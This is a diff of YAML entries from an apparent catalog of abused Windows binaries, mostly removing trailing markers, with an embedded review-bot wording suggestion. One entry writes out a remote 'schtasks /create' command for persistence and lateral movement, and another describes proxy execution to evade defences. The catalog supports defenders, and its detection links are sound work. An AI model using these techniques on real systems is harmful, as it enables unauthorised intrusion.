@ -26,4 +26,3 @@ Resources:
Acknowledgement:
- Person: Matt Graeber
Handle: '@mattifestation'
---


@ -36,4 +36,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---


@ -11,7 +11,7 @@ Commands:
Privileges: User
MitreID: T1053.005
OperatingSystem: Windows
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
Description: Create a scheduled task on a remote computer for persistence/lateral movement
Usecase: Create a remote task to run daily relative to the the time of creation
Category: Execute
@ -33,4 +33,3 @@ Resources:
Acknowledgement:
- Person:
Handle:
---


@ -1,6 +1,6 @@
---
Name: Scriptrunner.exe
Description:
Description: Execute binary through proxy binary to evade defensive counter measures
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
@ -33,4 +33,3 @@ Resources:
Acknowledgement:
- Person: Nick Tyrer
Handle: '@nicktyrer'
---
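Review bot: The new `Description` in the first hunk of this entry writes "counter measures" as two words and drops the articles, which reads awkwardly for a one-line summary; suggest `Description: Execute a binary through a proxy binary to evade defensive countermeasures`. The second hunk only drops the trailing document marker and needs nothing further.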


@ -31,4 +31,3 @@ Acknowledgement:
Handle: '@hexacorn'
- Person: Elliot Killick
Handle: '@elliotkillick'
---


@ -22,4 +22,3 @@ Resources:
Acknowledgement:
- Person: Eral4m
Handle: '@eral4m'
---


@ -25,4 +25,3 @@ Resources:
Acknowledgement:
- Person: Nick Landers
Handle: '@monoxgas'
---


@ -35,4 +35,3 @@ Acknowledgement:
Handle: '@oddvarmoe'
- Person: Maxime Nadeau
Handle: '@m_nad0'
---


@ -37,4 +37,3 @@ Acknowledgement:
Handle: '@oulusoyum'
- Person: Matt Graeber
Handle: '@mattifestation'
---


@ -22,13 +22,12 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_visual_basic_compiler.yml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_visual_basic_compiler.yml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
Acknowledgement:
- Person: Lior Adar
Handle:
- Person: Hai Vaknin(Lux)
Handle:
---
